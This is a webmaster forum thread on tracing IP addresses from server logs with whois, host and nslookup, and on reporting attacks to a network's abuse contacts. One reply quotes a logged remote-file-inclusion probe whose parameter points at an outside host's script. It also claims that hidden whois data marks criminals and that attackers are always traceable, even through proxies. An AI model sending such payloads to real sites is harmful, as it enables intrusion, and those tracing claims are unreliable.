1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Question: Find www address from IP address?

Discussion in 'Site & Server Administration' started by misohoni, Jun 13, 2004.

  1. #1
    Checking the logs and noticed a few people are trying to hack/hotlink my site. I've got their IP details, could I then find which web site they came from?
    SEMrush
     
    misohoni, Jun 13, 2004 IP
    SEMrush
  2. Smyrl

    Smyrl Tomato Republic Staff

    Messages:
    13,537
    Likes Received:
    1,582
    Best Answers:
    78
    Trophy Points:
    510
    #2
    If IP is unique to hacker, not a shared ip, you might see if a web site comes up when you type http://ip, I have no idea about a shared ip.

    Shannon
     
    Smyrl, Jun 13, 2004 IP
  3. disgust

    disgust Guest

    Messages:
    2,417
    Likes Received:
    133
    Best Answers:
    0
    Trophy Points:
    0
    #3
    most likely they aren't running these things from the same IP their site (if they have one) is hosted on.

    your chances of finding something are pretty slim, but yes, you could try just http://ip
     
    disgust, Jun 13, 2004 IP
  4. misohoni

    misohoni Notable Member

    Messages:
    1,717
    Likes Received:
    32
    Best Answers:
    0
    Trophy Points:
    200
    #4
    I tried entering http://ip but no luck. I think the IP is from a web site since it links to more than one file.
     
    misohoni, Jun 13, 2004 IP
  5. NevDull

    NevDull Peon

    Messages:
    21
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    When you're talking about an IP, are you talking about the IP in a referrer field? If not, then why are you saying it's a website?

    If you want to find out an administrative contact for the IP address of someone you think is trying to hack in, go to www.samspade.org and put the IP in the first box and click "Do Stuff". It'll do a whois on the IP address, which will give you contact information for the owners of the IPs.

    -Nev
     
    NevDull, Jul 17, 2004 IP
  6. THT

    THT Peon

    Messages:
    686
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    0
    #6
    you could try nslookup
     
    THT, Jul 17, 2004 IP
  7. misohoni

    misohoni Notable Member

    Messages:
    1,717
    Likes Received:
    32
    Best Answers:
    0
    Trophy Points:
    200
    #7
    Nevdull, no I have an IP address which I believe is linked to a website URL NOT a user.
     
    misohoni, Jul 17, 2004 IP
  8. mxlabs

    mxlabs Peon

    Messages:
    327
    Likes Received:
    6
    Best Answers:
    0
    Trophy Points:
    0
    #8
    try
    http://www.whois.sc/IPADDRESS

    you have to register to see all hosted websites though, in case that more than 1 domain is hosted on that IP
     
    mxlabs, Jul 20, 2004 IP
  9. orochi

    orochi Peon

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #9
    sorry but i have qustion
    haow to veiw hack ip
     
    orochi, Nov 9, 2007 IP
  10. orochi

    orochi Peon

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #10
    or haow i can got their IP details
     
    orochi, Nov 9, 2007 IP
  11. eXe

    eXe Notable Member

    Messages:
    4,643
    Likes Received:
    248
    Best Answers:
    0
    Trophy Points:
    285
  12. hans

    hans Well-Known Member

    Messages:
    2,924
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #12
    much easier than all above

    on a normal professional Linux desktop - all in shell ( bash )

    here a near real time real world example from a hacker attempt a few hours back:

    0.
    log lines - you send all - below is only one for you:
    85.214.42.97 - - [11/Nov/2007:03:50:02 +0800] "GET /english//include/config.inc.php?root=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 403 1012 "-" "libwww-perl/5.803"

    1.
    > host 85.214.42.97
    97.42.214.85.in-addr.arpa domain name pointer geest-verlag.de.

    >> gives you a domain name / web site if any associated
    then you have the option - again in bash

    2.
    now you may want to know WHO above site owner is - in bash
    > whois geest-verlag.de
    may give you full name, address, email, etc
    OR NOT if people want to hide
    never mind - in case of hacker or abuse you always go directly to HIGHEST level
    that is

    3.
    whois 85.214.42.97

    a whois on IP gives you the NETWORK - owner, i.e. an ISP or a datacenter!!
    their entry normally is LONG and meets all common legal requirements, no hiding anymore - HIDING of whois data is for CRIMINALS and people who eventually may plan to so such or similar illegal things. honest site owners always have a full and public WHOIS record !

    you usually always find an abuse email address to report hacker attacks or copyright infringement abuse originating FROM ANY of their IPs - no matter wether domain name associated or dynamic IP.

    if NO abuse@ ... listed but only the network domain name

    still send your email to abuse@ that web site of network owner - abuse addresses are required and networks have one even if NOT listed
    in addition on the above whois "IP" you normally get hostmaster@ and a few other email addresses with short comments

    send your email to all listed addresses to assure it is processed the fastest way
    hence an eMail TO:
    abuse@ xyz
    hostmaster@ xyz
    webmaster@ xyz

    always include facts and solid legal FULL evidence of hot linking and copyright infringement. make it a professional email with ALL data and all facts that allow an instant and final reaction by the network owner!

    in case of hacker attempts - include all related log lines from your access_log or error_log or
    /var/log/messages
    depending on the kind of hacker attack

    remember that ALL is logged and if at a certain time a dynamic IP was used for 60 seconds - accessed via cable or however - that origin or the 60 seconds access is logged and can normally always be tracked to the apartment and computer being used - even if hacker uses proxy !! with proxy it simply needs one more step - but procedure to track is the same.

    hence to track down an IP to its data center is a matter of seconds - to send the abuse complaint another few minutes in case of hacker abuse just forward the log lines your server SENT YOU with 2-3 lines - no extra comments needed - the log lines say it all - see above case.
    example for above real scenario situation this morning:

    active hacker from your network IP 85.214.42.97
    attached loglines from a hacker visit on my server a few hours ago
    log times are GMT +8
    the first line should/might be a clear subject line for an email to abuse@ so the person on duty instantly sees the priority of your mail - hacker stuff may be done in seconds because hackers may do substantial damage to OTHERS as well - copyright infringement may have a few hours longer.

    NEVER waste your time emailing the actual site owner. most site owners have NO idea about their own site NOR about security NOR about how to solve - a hostmaster shuts their site down in minutes or at least shuts down the path from within which abuse took place while site owners love to argue and lose / waste your precious time. in addition many site OWNERS lack the required email addresses such as info@, webmaster@ and abuse@

    hence you email to a site and hours later you may get all emails bouncing back and nothing at all has been done.
     
    hans, Nov 10, 2007 IP
  13. quickseller

    quickseller Banned

    Messages:
    196
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #13
    u can check ur ip at check my ip .com
     
    quickseller, Nov 10, 2007 IP
  14. V3RT1G0

    V3RT1G0 Peon

    Messages:
    201
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #14
    V3RT1G0, Nov 10, 2007 IP
  15. orochi

    orochi Peon

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    haow i can got vistor ip
    becose some hack is on my site
    after get ip ican know how is he
     
    orochi, Nov 11, 2007 IP
  16. eXe

    eXe Notable Member

    Messages:
    4,643
    Likes Received:
    248
    Best Answers:
    0
    Trophy Points:
    285
    #16
    eXe, Nov 11, 2007 IP
  17. sanam123

    sanam123 Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #17
    Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 127.0.0.1.

    Since these numbers are usually assigned to internet service providers within region-based blocks, an IP address can often be used to identify the region or country from which a computer is connecting to the Internet. An IP address can sometimes be used to show the user's general location.
     
    sanam123, Feb 10, 2011 IP